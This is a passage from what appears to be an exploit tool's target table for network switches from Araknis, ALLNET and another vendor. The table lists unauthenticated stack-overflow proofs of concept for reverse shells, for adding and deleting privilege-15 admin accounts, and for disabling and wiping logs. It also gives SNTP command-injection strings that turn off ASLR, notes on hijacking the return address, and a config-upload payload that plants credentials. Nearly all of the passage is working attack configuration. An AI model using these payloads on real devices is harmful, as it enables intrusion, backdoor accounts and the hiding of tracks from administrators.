self.random_string(288),\r\n\t\t\t\t\t\t\t'check_uri':False,\r\n\t\t\t\t\t\t\t'content_check':False,\r\n\t\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t\t\t'safe': True\r\n\t\t\t\t\t\t},\r\n\t\t\t\t},\r\n\t\t\t\t'exploit': {\r\n\t\t\t\t\t'heack_hydra_shell': {\r\n\t\t\t\t\t\t'description':'[Boa/Hydra] Stack overflow in Boa/Hydra web server (PoC: reverse shell)',\r\n\t\t\t\t\t\t'authenticated': False,\r\n\t\t\t\t\t\t'uri':'/cgi-bin/sn_httpupload.cgi?', # Including alignment of opcodes in memory\r\n\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t\t'safe': False # Boa/Hydra restart/watchdog, False = no restart, True = restart\r\n\t\t\t\t\t},\r\n\t\t\t\t\t'priv15_account': {\r\n\t\t\t\t\t\t'description':'Upload/Update running-config (PoC: add priv 15 credentials)',\r\n\t\t\t\t\t\t'authenticated': False,\r\n\t\t\t\t\t\t'json':True,\r\n\t\t\t\t\t\t'encryption':'',\r\n\t\t\t\t\t\t'content':'',\r\n\t\t\t\t\t\t'add_uri':'',\r\n\t\t\t\t\t\t'del_query':'',\r\n\t\t\t\t\t\t'del_uri':'',\r\n\t\t\t\t\t\t'vulnerable': False,\r\n\t\t\t\t\t\t'safe': True\r\n\t\t\t\t\t}, \r\n\t\t\t\t\t'sntp': {\r\n\t\t\t\t\t\t'description':'SNTP command injection (PoC: disable ASLR)',\r\n\t\t\t\t\t\t'json':True,\r\n\t\t\t\t\t\t'authenticated': True,\t# <================================\r\n\t\t\t\t\t\t'enable_uri':'/cgi/set.cgi?cmd=sys_timeSettings',\r\n\t\t\t\t\t\t'enable_query':'{\"_ds=1&sntpStatus=1&_de=1\":{}}',\r\n\t\t\t\t\t\t'status_uri':'/cgi/get.cgi?cmd=sys_timeSettings',\r\n\t\t\t\t\t\t'inject_uri':'/cgi/set.cgi?cmd=sys_timeSntp',\r\n\t\t\t\t\t\t'inject_query':'{\"_ds=1&srvDef=byIp&sntpServer=`echo 0 > /proc/sys/kernel/randomize_va_space`&cursntpPort=123&_de=1\":{}}',\r\n\t\t\t\t\t\t'check_query':'{\"_ds=1&srvDef=byIp&sntpServer=`cat /proc/sys/kernel/randomize_va_space > /tmp/check`&cursntpPort=123&_de=1\":{}}',\r\n\t\t\t\t\t\t'delete_uri':'/cgi/set.cgi?cmd=sys_timeSntpDel',\r\n\t\t\t\t\t\t'delete_query':'{\"\":{}}',\r\n\t\t\t\t\t\t'disable_uri':'/cgi/set.cgi?cmd=sys_timeSettings',\r\n\t\t\t\t\t\t'disable_query':'{\"_ds=1&sntpStatus=0&_de=1\":{}}',\r\n\t\t\t\t\t\t'verify_uri':'/tmp/check',\r\n\t\t\t\t\t\t'vulnerable': False, # It is vulnerable, but I am not using this authenticated code here :>\r\n\t\t\t\t\t\t'safe': True\r\n\t\t\t\t\t},\r\n\t\t\t\t\t#\r\n\t\t\t\t\t# The stack overflow in 'username' and 'password' at same request are multipurpose.\r\n\t\t\t\t\t#\r\n\r\n\t\t\t\t\t#\r\n\t\t\t\t\t# The trick to jump and execute:\r\n\t\t\t\t\t# 1. Code: username=[garbage][RA + 0x58000000]&password=[garbage][NULL termination]\r\n\t\t\t\t\t# 2. [NULL termination] will overwrite 0x58 in RA so we can jump within the binary\r\n\t\t\t\t\t# 3. We dont jump to beginning of the functions, we jump just after 'sw $ra,($sp)' (important)\r\n\t\t\t\t\t# 4. We will also feed required function parameters, by adding them to '_CMD_'\r\n\t\t\t\t\t#\r\n\t\t\t\t\t# Bonus: Disable and clean logs\r\n\t\t\t\t\t#\r\n\t\t\t\t\t#\r\n\t\t\t\t\t'stack_cgi_add_account': {\r\n\t\t\t\t\t\t'description':'Stack overflow in \"username/password\" (PoC: add priv 15 credentials)',\r\n\t\t\t\t\t\t'authenticated': False,\r\n\t\t\t\t\t\t'uri':'/cgi-bin/datajson.cgi?login',\r\n\t\t\t\t\t\t'content':'usr='+ self.random_string(324)+ '_JUMP_&pswrd='+ self.random_string(284) +'_CMD_',\r\n\r\n\t\t\t\t\t\t'workaround':False,\t# My LAB workaround\r\n\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t\t'safe': True\r\n\t\t\t\t\t},\r\n\t\t\t\t\t'stack_cgi_del_account': {\r\n\t\t\t\t\t\t'description':'Stack overflow in \"username/password\" (PoC: del priv 15 credentials)',\r\n\t\t\t\t\t\t'authenticated': False,\r\n\t\t\t\t\t\t'uri':'/cgi-bin/datajson.cgi?login',\r\n\t\t\t\t\t\t'content':'usr='+ self.random_string(324)+ '_JUMP_&pswrd='+ self.random_string(284) +'_CMD_',\r\n\r\n\t\t\t\t\t\t'workaround':False,\t# My LAB workaround\r\n\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t\t'safe': True\r\n\t\t\t\t\t},\r\n\t\t\t\t\t'stack_cgi_diag': {\r\n\t\t\t\t\t\t'description':'Stack overflow in \"username/password\" (PoC: Disable ASLR)',\r\n\t\t\t\t\t\t'authenticated': False,\r\n\r\n\t\t\t\t\t\t'uri':'/cgi-bin/datajson.cgi?login',\r\n\t\t\t\t\t\t'content':'usr='+ self.random_string(324)+ '_JUMP_&pswrd='+ self.random_string(284) +'_CMD_',\r\n\t\t\t\t\t\t'sys_ping_post_SIGSEGV': True,\t\t# SIGSEGV ?\r\n\r\n\t\t\t\t\t\t'workaround':False,\t# My LAB workaround\r\n\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t\t'safe': True\r\n\r\n\t\t\t\t\t},\r\n\t\t\t\t\t'stack_cgi_log': {\r\n\t\t\t\t\t\t'description':'Stack overflow in \"username/password\" (PoC: Disable/Clean logs)',\r\n\t\t\t\t\t\t'authenticated': False,\r\n\t\t\t\t\t\t'uri':'/cgi-bin/datajson.cgi?login',\r\n\t\t\t\t\t\t'content':'usr='+ self.random_string(324)+ '_JUMP_&pswrd='+ self.random_string(284) +'_CMD_',\r\n\r\n\t\t\t\t\t\t'log_settings_set_cmd':'&en=0',\t\t\t\t# Disable Logging CMD\r\n\t\t\t\t\t\t'log_settings_set_SIGSEGV':True,\t\t\t# Disable Logging SIGSEGV ?\r\n\r\n\t\t\t\t\t\t'log_ramClear_cmd':'&ta=0',\t\t\t\t\t# Clean RAM CMD\r\n\t\t\t\t\t\t'log_ramClear_SIGSEGV':True,\t\t\t\t# Clean RAM SIGSEGV ?\r\n\r\n\t\t\t\t\t\t'log_fileClear_cmd':'&ta=1',\t\t\t\t# Clean FILE log CMD\r\n\t\t\t\t\t\t'log_fileClear_SIGSEGV':True,\t\t\t\t# Clean FILE log SIGSEGV ?\r\n\r\n\t\t\t\t\t\t'workaround':False,\t# My LAB workaround\r\n\t\t\t\t\t\t'verify_uri':'',\r\n\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t\t'safe': True\r\n\t\t\t\t\t},\r\n\t\t\t\t\t'stack_cgi_sntp': {\r\n\t\t\t\t\t\t'description':'Stack overflow in \"username/password\" (PoC: Disable ASLR)',\r\n\t\t\t\t\t\t'authenticated': False,\r\n\t\t\t\t\t\t'uri':'/cgi-bin/datajson.cgi?login',\r\n\t\t\t\t\t\t'content':'usr='+ self.random_string(324)+ '_JUMP_&pswrd='+ self.random_string(284) +'_CMD_',\r\n\r\n\t\t\t\t\t\t'sys_timeSntp_set_cmd':'&sa=`echo 0 > /proc/sys/kernel/randomize_va_space`&sp=123',\r\n\t\t\t\t\t\t'sys_timeSntp_set_check':'&sa=`cat /proc/sys/kernel/randomize_va_space > /tmp/conf_tmp/check`&sp=123',\r\n\r\n\t\t\t\t\t\t'sys_timeSntpDel_set_cmd':'&sa=+&sp=123',\t\t\t\t# CMD\r\n\r\n\t\t\t\t\t\t'sys_timeSettings_set_cmd_enable':'&sn=1',\t# Enable CMD\r\n\t\t\t\t\t\t'sys_timeSettings_set_cmd_disable':'&sn=0',\t# Disable CMD\r\n\t\t\t\t\t\t'sys_timeSettings_set_SIGSEGV': True,\t\t# SIGSEGV ?\r\n\r\n\t\t\t\t\t\t'workaround':False,\t# My LAB workaround\r\n\t\t\t\t\t\t'verify_uri':'/conf_tmp/check',\r\n\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t\t'safe': True\r\n\t\t\t\t\t}, \r\n\t\t\t\t\t#\r\n\t\t\t\t\t# Used for both 'heap' and 'stack'\r\n\t\t\t\t\t#\r\n\t\t\t\t\t'heack_cgi_shell': {\r\n\t\t\t\t\t\t'description':'Stack overflow in \"username/password\" (PoC: reverse shell)',\r\n\t\t\t\t\t\t'authenticated': False,\r\n\t\t\t\t\t\t'login_uri':'/cgi-bin/security.cgi?login',\r\n\t\t\t\t\t\t'logout_uri':'/cgi-bin/security.cgi?logout',\r\n\t\t\t\t\t\t'query':'build=NOP&heap=NOP&to=NOP&higher=addresses&usr=admin&pswrd=_PWDNOP_RA_START&shellcode=_USRNOP_SHELLCODE',\r\n\t\t\t\t\t\t#'stack':False, # False = use Heap, and there are no ASLR\r\n\t\t\t\t\t\t'workaround':False,\t# My LAB workaround\r\n\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t\t'safe': True\r\n\t\t\t\t\t},\r\n\r\n\t\t\t\t},\r\n\t\t\t},\r\n\r\n\t\t\t'Araknis': { \r\n\t\t\t\t'vendor': 'Araknis Networks',\r\n\t\t\t\t'modulus_uri':'',\r\n\t\t\t\t'info_leak':True,\r\n\t\t\t\t'info_leak_JSON':False,\r\n\t\t\t\t'info_leak_uri':'/loginMsg.js',\r\n\t\t\t\t'xsid':False,\r\n\t\t\t\t'xsid_uri':'',\r\n\t\t\t\t'login': {\r\n\t\t\t\t\t'description':'Login/Logout on remote device',\r\n\t\t\t\t\t'authenticated': True,\r\n\t\t\t\t\t'json':True,\r\n\t\t\t\t\t'encryption':'',\r\n\t\t\t\t\t'login_uri':'',\r\n\t\t\t\t\t'query':'',\r\n\t\t\t\t\t'status_uri':'',\r\n\t\t\t\t\t'logout_uri':'',\r\n\t\t\t\t\t'vulnerable': False,\r\n\t\t\t\t\t'safe': True\r\n\t\t\t\t},\r\n\t\t\t\t'login': {\r\n\t\t\t\t\t'description':'Login/Logout on remote device',\r\n\t\t\t\t\t'authenticated': True,\r\n\t\t\t\t\t'json':True,\r\n\t\t\t\t\t'encryption':'',\r\n\t\t\t\t\t'login_uri':'',\r\n\t\t\t\t\t'query':'',\r\n\t\t\t\t\t'status_uri':'',\r\n\t\t\t\t\t'logout_uri':'',\r\n\t\t\t\t\t'vulnerable': False,\r\n\t\t\t\t\t'safe': True\r\n\t\t\t\t},\r\n\t\t\t\t'log':{\r\n\t\t\t\t\t\t'description':'Disable and clean logs',\r\n\t\t\t\t\t\t'authenticated': True,\r\n\t\t\t\t\t\t'json':True,\r\n\t\t\t\t\t\t'disable_uri':'',\r\n\t\t\t\t\t\t'disable_query':'',\r\n\t\t\t\t\t\t'status':'',\r\n\t\t\t\t\t\t'clean_logfile_uri':'',\r\n\t\t\t\t\t\t'clean_logfile_query':'',\r\n\t\t\t\t\t\t'clean_logmem_uri':'',\r\n\t\t\t\t\t\t'clean_logmem_query':'',\r\n\t\t\t\t\t\t'vulnerable': False,\r\n\t\t\t\t\t\t'safe': True\r\n\t\t\t\t},\r\n\t\t\t\t# Verify lacking authentication\r\n\t\t\t\t'verify': { \r\n\t\t\t\t\t\t'security.cgi': { # 'username' also suffer from stack overflow\r\n\t\t\t\t\t\t\t'description':'Stack overflow in \"username/password\" (PoC: crash CGI)',\r\n\t\t\t\t\t\t\t'authenticated': False,\r\n\t\t\t\t\t\t\t'response':'502',\r\n\t\t\t\t\t\t\t'Content-Type':False,\r\n\t\t\t\t\t\t\t'uri':'/cgi-bin/security.cgi?login',\r\n\t\t\t\t\t\t\t'content':'usr=admin&pswrd=' + self.random_string(280),\r\n\t\t\t\t\t\t\t'check_uri':False,\r\n\t\t\t\t\t\t\t'content_check':False,\r\n\t\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t\t\t'safe': True\r\n\t\t\t\t\t\t},\r\n\t\t\t\t\t\t'datajson.cgi': { # 'username' also suffer from stack overflow\r\n\t\t\t\t\t\t\t'description':'Stack overflow in \"username/password\" (PoC: crash CGI)',\r\n\t\t\t\t\t\t\t'authenticated': False,\r\n\t\t\t\t\t\t\t'response':'502',\r\n\t\t\t\t\t\t\t'Content-Type':False,\r\n\t\t\t\t\t\t\t'uri':'/cgi-bin/datajson.cgi?login',\r\n\t\t\t\t\t\t\t'content':'usr=admin&pswrd=' + self.random_string(288),\r\n\t\t\t\t\t\t\t'check_uri':False,\r\n\t\t\t\t\t\t\t'content_check':False,\r\n\t\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t\t\t'safe': True\r\n\t\t\t\t\t\t},\r\n\t\t\t\t},\r\n\t\t\t\t'exploit': {\r\n\t\t\t\t\t'heack_hydra_shell': {\r\n\t\t\t\t\t\t'description':'[Boa/Hydra] Stack overflow in Boa/Hydra web server (PoC: reverse shell)',\r\n\t\t\t\t\t\t'authenticated': False,\r\n\t\t\t\t\t\t'uri':'/cgi-bin/sn_httpupload.cgi?', # Including alignment of opcodes in memory\r\n\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t\t'safe': False # Boa/Hydra restart/watchdog, False = no restart, True = restart\r\n\t\t\t\t\t},\r\n\t\t\t\t\t'priv15_account': {\r\n\t\t\t\t\t\t'description':'Upload/Update running-config (PoC: add priv 15 credentials)',\r\n\t\t\t\t\t\t'authenticated': False,\r\n\t\t\t\t\t\t'json':True,\r\n\t\t\t\t\t\t'encryption':'',\r\n\t\t\t\t\t\t'content':'',\r\n\t\t\t\t\t\t'add_uri':'',\r\n\t\t\t\t\t\t'del_query':'',\r\n\t\t\t\t\t\t'del_uri':'',\r\n\t\t\t\t\t\t'vulnerable': False,\r\n\t\t\t\t\t\t'safe': True\r\n\t\t\t\t\t}, \r\n\t\t\t\t\t'sntp': {\r\n\t\t\t\t\t\t'description':'SNTP command injection (PoC: disable ASLR)',\r\n\t\t\t\t\t\t'json':True,\r\n\t\t\t\t\t\t'authenticated': True,\t# <================================\r\n\t\t\t\t\t\t'enable_uri':'/cgi/set.cgi?cmd=sys_timeSettings',\r\n\t\t\t\t\t\t'enable_query':'{\"_ds=1&sntpStatus=1&_de=1\":{}}',\r\n\t\t\t\t\t\t'status_uri':'/cgi/get.cgi?cmd=sys_timeSettings',\r\n\t\t\t\t\t\t'inject_uri':'/cgi/set.cgi?cmd=sys_timeSntp',\r\n\t\t\t\t\t\t'inject_query':'{\"_ds=1&srvDef=byIp&sntpServer=`echo 0 > /proc/sys/kernel/randomize_va_space`&cursntpPort=123&_de=1\":{}}',\r\n\t\t\t\t\t\t'check_query':'{\"_ds=1&srvDef=byIp&sntpServer=`cat /proc/sys/kernel/randomize_va_space > /tmp/check`&cursntpPort=123&_de=1\":{}}',\r\n\t\t\t\t\t\t'delete_uri':'/cgi/set.cgi?cmd=sys_timeSntpDel',\r\n\t\t\t\t\t\t'delete_query':'{\"\":{}}',\r\n\t\t\t\t\t\t'disable_uri':'/cgi/set.cgi?cmd=sys_timeSettings',\r\n\t\t\t\t\t\t'disable_query':'{\"_ds=1&sntpStatus=0&_de=1\":{}}',\r\n\t\t\t\t\t\t'verify_uri':'/tmp/check',\r\n\t\t\t\t\t\t'vulnerable': False, # It is vulnerable, but I am not using this authenticated code here :>\r\n\t\t\t\t\t\t'safe': True\r\n\t\t\t\t\t},\r\n\t\t\t\t\t#\r\n\t\t\t\t\t# The stack overflow in 'username' and 'password' at same request are multipurpose.\r\n\t\t\t\t\t#\r\n\r\n\t\t\t\t\t#\r\n\t\t\t\t\t# The trick to jump and execute:\r\n\t\t\t\t\t# 1. Code: username=[garbage][RA + 0x58000000]&password=[garbage][NULL termination]\r\n\t\t\t\t\t# 2. [NULL termination] will overwrite 0x58 in RA so we can jump within the binary\r\n\t\t\t\t\t# 3. We dont jump to beginning of the functions, we jump just after 'sw $ra,($sp)' (important)\r\n\t\t\t\t\t# 4. We will also feed required function parameters, by adding them to '_CMD_'\r\n\t\t\t\t\t#\r\n\t\t\t\t\t'stack_cgi_add_account': {\r\n\t\t\t\t\t\t'description':'Stack overflow in \"username/password\" (PoC: add priv 15 credentials)',\r\n\t\t\t\t\t\t'authenticated': False,\r\n\t\t\t\t\t\t'uri':'/cgi-bin/datajson.cgi?login',\r\n\t\t\t\t\t\t'content':'usr='+ self.random_string(324)+ '_JUMP_&pswrd='+ self.random_string(284) +'_CMD_',\r\n\r\n\t\t\t\t\t\t'workaround':False,\t# My LAB workaround\r\n\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t\t'safe': True\r\n\t\t\t\t\t},\r\n\t\t\t\t\t'stack_cgi_del_account': {\r\n\t\t\t\t\t\t'description':'Stack overflow in \"username/password\" (PoC: del priv 15 credentials)',\r\n\t\t\t\t\t\t'authenticated': False,\r\n\t\t\t\t\t\t'uri':'/cgi-bin/datajson.cgi?login',\r\n\t\t\t\t\t\t'content':'usr='+ self.random_string(324)+ '_JUMP_&pswrd='+ self.random_string(284) +'_CMD_',\r\n\r\n\t\t\t\t\t\t'workaround':False,\t# My LAB workaround\r\n\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t\t'safe': True\r\n\t\t\t\t\t},\r\n\t\t\t\t\t'stack_cgi_diag': {\r\n\t\t\t\t\t\t'description':'Stack overflow in \"username/password\" (PoC: Disable ASLR)',\r\n\t\t\t\t\t\t'authenticated': False,\r\n\r\n\t\t\t\t\t\t'uri':'/cgi-bin/datajson.cgi?login',\r\n\t\t\t\t\t\t'content':'usr='+ self.random_string(324)+ '_JUMP_&pswrd='+ self.random_string(284) +'_CMD_',\r\n\t\t\t\t\t\t'sys_ping_post_SIGSEGV': True,\t\t# SIGSEGV ?\r\n\r\n\t\t\t\t\t\t'workaround':False,\t# My LAB workaround\r\n\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t\t'safe': True\r\n\r\n\t\t\t\t\t},\r\n\t\t\t\t\t'stack_cgi_log': {\r\n\t\t\t\t\t\t'description':'Stack overflow in \"username/password\" (PoC: Disable/Clean logs)',\r\n\t\t\t\t\t\t'authenticated': False,\r\n\t\t\t\t\t\t'uri':'/cgi-bin/datajson.cgi?login',\r\n\t\t\t\t\t\t'content':'usr='+ self.random_string(324)+ '_JUMP_&pswrd='+ self.random_string(284) +'_CMD_',\r\n\r\n\t\t\t\t\t\t'log_settings_set_cmd':'&en=0',\t\t\t\t# Disable Logging CMD\r\n\t\t\t\t\t\t'log_settings_set_SIGSEGV':True,\t\t\t# Disable Logging SIGSEGV ?\r\n\r\n\t\t\t\t\t\t'log_ramClear_cmd':'&ta=0',\t\t\t\t\t# Clean RAM CMD\r\n\t\t\t\t\t\t'log_ramClear_SIGSEGV':True,\t\t\t\t# Clean RAM SIGSEGV ?\r\n\r\n\t\t\t\t\t\t'log_fileClear_cmd':'&ta=1',\t\t\t\t# Clean FILE log CMD\r\n\t\t\t\t\t\t'log_fileClear_SIGSEGV':True,\t\t\t\t# Clean FILE log SIGSEGV ?\r\n\r\n\t\t\t\t\t\t'workaround':False,\t# My LAB workaround\r\n\t\t\t\t\t\t'verify_uri':'',\r\n\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t\t'safe': True\r\n\t\t\t\t\t},\r\n\t\t\t\t\t'stack_cgi_sntp': {\r\n\t\t\t\t\t\t'description':'Stack overflow in \"username/password\" (PoC: Disable ASLR)',\r\n\t\t\t\t\t\t'authenticated': False,\r\n\t\t\t\t\t\t'uri':'/cgi-bin/datajson.cgi?login',\r\n\t\t\t\t\t\t'content':'usr='+ self.random_string(324)+ '_JUMP_&pswrd='+ self.random_string(284) +'_CMD_',\r\n\r\n\t\t\t\t\t\t'sys_timeSntp_set_cmd':'&sa=`echo 0 > /proc/sys/kernel/randomize_va_space`&sp=123',\r\n\t\t\t\t\t\t'sys_timeSntp_set_check':'&sa=`cat /proc/sys/kernel/randomize_va_space > /tmp/conf_tmp/check`&sp=123',\r\n\r\n\t\t\t\t\t\t'sys_timeSntpDel_set_cmd':'&sa=+&sp=123',\t\t\t\t# CMD\r\n\r\n\t\t\t\t\t\t'sys_timeSettings_set_cmd_enable':'&sn=1',\t# Enable CMD\r\n\t\t\t\t\t\t'sys_timeSettings_set_cmd_disable':'&sn=0',\t# Disable CMD\r\n\t\t\t\t\t\t'sys_timeSettings_set_SIGSEGV': True,\t\t# SIGSEGV ?\r\n\r\n\t\t\t\t\t\t'workaround':False,\t# My LAB workaround\r\n\t\t\t\t\t\t'verify_uri':'/conf_tmp/check',\r\n\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t\t'safe': True\r\n\t\t\t\t\t}, \r\n\t\t\t\t\t#\r\n\t\t\t\t\t# Used for both 'heap' and 'stack'\r\n\t\t\t\t\t#\r\n\t\t\t\t\t'heack_cgi_shell': {\r\n\t\t\t\t\t\t'description':'Stack overflow in \"username/password\" (PoC: reverse shell)',\r\n\t\t\t\t\t\t'authenticated': False,\r\n\t\t\t\t\t\t'login_uri':'/cgi-bin/security.cgi?login',\r\n\t\t\t\t\t\t'logout_uri':'/cgi-bin/security.cgi?logout',\r\n\t\t\t\t\t\t'query':'build=NOP&heap=NOP&to=NOP&higher=addresses&usr=admin&pswrd=_PWDNOP_RA_START&shellcode=_USRNOP_SHELLCODE',\r\n\t\t\t\t\t\t'stack':False, # False = use Heap, and there are no ASLR\r\n\t\t\t\t\t\t'workaround':False,\t# My LAB workaround\r\n\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t\t'safe': True\r\n\t\t\t\t\t},\r\n\r\n\t\t\t\t},\r\n\t\t\t},\r\n\r\n\t\t\t'ALLNET_JSON': { \r\n\t\t\t\t'vendor': 'ALLNET GmbH Computersysteme',\r\n\t\t\t\t'model':'ALL-SG82xx',\r\n\t\t\t\t'uri':'https://www.allnet.de/',\r\n\t\t\t\t'modulus_uri':'/cgi/get.cgi?cmd=home_login',\r\n\t\t\t\t'info_leak':False,\r\n\t\t\t\t'info_leak_JSON':True,\r\n\t\t\t\t'info_leak_uri':'/cgi/get.cgi?cmd=home_login',\r\n\t\t\t\t'xsid':False,\r\n\t\t\t\t'xsid_uri':'/cgi/get.cgi?cmd=home_main',\r\n\t\t\t\t'login': {\r\n\t\t\t\t\t'description':'Login/Logout on remote device',\r\n\t\t\t\t\t'authenticated': True,\r\n\t\t\t\t\t'json':True,\r\n\t\t\t\t\t'encryption':'rsa',\r\n\t\t\t\t\t'login_uri':'/cgi/set.cgi?cmd=home_loginAuth',\r\n\t\t\t\t\t'query':'{\"_ds=1&username=USERNAME&password=PASSWORD&_de=1\":{}}',\r\n\t\t\t\t\t'status_uri':'/cgi/get.cgi?cmd=home_loginStatus',\r\n\t\t\t\t\t'logout_uri':'/cgi/set.cgi?cmd=home_logout',\r\n\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t'safe': True\r\n\t\t\t\t},\r\n\t\t\t\t'log':{\r\n\t\t\t\t\t\t'description':'Disable and clean logs',\r\n\t\t\t\t\t\t'authenticated': True,\r\n\t\t\t\t\t\t'json':True,\r\n\t\t\t\t\t\t'disable_uri':'/cgi/set.cgi?cmd=log_global',\r\n\t\t\t\t\t\t'disable_query':'{\"_ds=1&empty=1&_de=1\":{}}',\r\n\t\t\t\t\t\t'status':'/cgi/get.cgi?cmd=log_global',\r\n\t\t\t\t\t\t'clean_logfile_uri':'/cgi/set.cgi?cmd=log_clear',\r\n\t\t\t\t\t\t'clean_logfile_query':'{\"_ds=1&target=1&_de=1\":{}}',\r\n\t\t\t\t\t\t'clean_logmem_uri':'/cgi/set.cgi?cmd=log_clear',\r\n\t\t\t\t\t\t'clean_logmem_query':'{\"_ds=1&target=0&_de=1\":{}}',\r\n\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t\t'safe': True\r\n\t\t\t\t},\r\n\t\t\t\t# Verify lacking authentication\r\n\t\t\t\t'verify': { \r\n\t\t\t\t\t\t'httpuploadruncfg.cgi':{\r\n\t\t\t\t\t\t\t'authenticated': False,\r\n\t\t\t\t\t\t\t'response':'file',\r\n\t\t\t\t\t\t\t'Content-Type':True,\r\n\t\t\t\t\t\t\t'description':'Upload/update \"running-config\" (PoC: Create invalid file to verify)',\r\n\t\t\t\t\t\t\t'uri':'/cgi/httpuploadruncfg.cgi',\r\n\t\t\t\t\t\t\t'check_uri':'/tmp/http_saverun_cfg',\r\n\t\t\t\t\t\t\t'content':'/var/config/running-config',\r\n\t\t\t\t\t\t\t'content_check':'/var/config/running-config',\r\n\t\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t\t\t'safe': True\r\n\t\t\t\t\t\t},\r\n\t\t\t\t\t\t'httprestorecfg.cgi':{\r\n\t\t\t\t\t\t\t'authenticated': False,\r\n\t\t\t\t\t\t\t'response':'file',\r\n\t\t\t\t\t\t\t'Content-Type':True,\r\n\t\t\t\t\t\t\t'description':'Upload \"startup-config\" (PoC: Create invalid file to verify)',\r\n\t\t\t\t\t\t\t'uri':'/cgi/httprestorecfg.cgi',\r\n\t\t\t\t\t\t\t'check_uri':'/tmp/startup-config',\r\n\t\t\t\t\t\t\t'content':'/mnt/startup-config',\r\n\t\t\t\t\t\t\t'content_check':'/mnt/startup-config',\r\n\t\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t\t\t'safe': True\r\n\t\t\t\t\t\t},\r\n\t\t\t\t\t\t'httpupload.cgi':{\r\n\t\t\t\t\t\t\t'authenticated': False,\r\n\t\t\t\t\t\t\t'response':'file',\r\n\t\t\t\t\t\t\t'Content-Type':True,\r\n\t\t\t\t\t\t\t'description':'Upload/Upgrade \"Firmware\" (PoC: Create invalid file to verify)',\r\n\t\t\t\t\t\t\t'uri':'/cgi-bin/httpupload.cgi',\r\n\t\t\t\t\t\t\t'check_uri':'/tmp/http_uploadfail',\r\n\t\t\t\t\t\t\t'content':'Copy: Illegal software format', # Not the real content, its the result of invalid firmware (workaround)\r\n\t\t\t\t\t\t\t'content_check':'Copy: Illegal software format',\r\n\t\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t\t\t'safe': True\r\n\t\t\t\t\t\t},\r\n\t\t\t\t\t\t'login.cgi': {\r\n\t\t\t\t\t\t\t'description':'Stack overflow in login.cgi (PoC: create file /tmp/VUL.TXT)',\r\n\t\t\t\t\t\t\t'authenticated': False,\r\n\t\t\t\t\t\t\t'response':'file',\r\n\t\t\t\t\t\t\t'Content-Type':False,\r\n\t\t\t\t\t\t\t'uri':'/cgi/set.cgi?cmd=home_loginAuth',\r\n\t\t\t\t\t\t\t'check_uri':'/tmp/VUL.TXT', # We cannot control the content...\r\n\t\t\t\t\t\t\t'content':'{\"_ds=1&username='+ self.random_string(40) +'&password='+ '/' * 23 +'/tmp/VUL.TXT&_de=1\":{}}',\r\n\t\t\t\t\t\t\t'content_check':'2',\r\n\t\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t\t\t'safe': True\r\n\t\t\t\t\t\t},\r\n\t\t\t\t\t\t'set.cgi': { # 'username' also suffer from stack overflow\r\n\t\t\t\t\t\t\t'description':'Stack overflow in \"username/password\" (PoC: crash CGI)',\r\n\t\t\t\t\t\t\t'authenticated': False,\r\n\t\t\t\t\t\t\t'response':'502',\r\n\t\t\t\t\t\t\t'Content-Type':False,\r\n\t\t\t\t\t\t\t'uri':'/cgi/set.cgi?cmd=home_loginAuth',\r\n\t\t\t\t\t\t\t'content':'{\"_ds=1&username=admin&password=' + self.random_string(312) + '&_de=1\":{}}',\r\n\t\t\t\t\t\t\t'check_uri':False,\r\n\t\t\t\t\t\t\t'content_check':False,\r\n\t\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t\t\t'safe': True\r\n\t\t\t\t\t\t},\r\n\t\t\t\t},\r\n\t\t\t\t'exploit': {\r\n\t\t\t\t\t'heack_hydra_shell': {\r\n\t\t\t\t\t\t'description':'[Boa/Hydra] Stack overflow in Boa/Hydra web server (PoC: reverse shell)',\r\n\t\t\t\t\t\t'authenticated': False,\r\n\t\t\t\t\t\t'uri':'/cgi-bin/httpupload.cgi?XXX', # Including alignment of opcodes in memory\r\n\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t\t'safe': False # Boa/Hydra restart/watchdog, False = no restart, True = restart\r\n\t\t\t\t\t},\r\n\t\t\t\t\t'priv15_account': {\r\n\t\t\t\t\t\t'description':'Upload/Update running-config (PoC: add priv 15 credentials)',\r\n\t\t\t\t\t\t'authenticated': False,\r\n\t\t\t\t\t\t'json':True,\r\n\t\t\t\t\t\t'encryption':'clear',\r\n\t\t\t\t\t\t'content':'Content-Type\\n\\nSYSTEM CONFIG FILE ::= BEGIN\\nusername \"USERNAME\" password PASSWORD\\n\\n------',\r\n\t\t\t\t\t\t'add_uri':'/cgi/httpuploadruncfg.cgi',\r\n\t\t\t\t\t\t'del_query':'{\"_ds=1&user=USERNAME&_de=1\":{}}',\r\n\t\t\t\t\t\t'del_uri':'/cgi/set.cgi?cmd=sys_acctDel',\r\n\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t\t'safe': True\r\n\t\t\t\t\t}, \r\n\t\t\t\t\t'sntp': {\r\n\t\t\t\t\t\t'description':'SNTP command injection (PoC: disable ASLR)',\r\n\t\t\t\t\t\t'json':True,\r\n\t\t\t\t\t\t'authenticated': 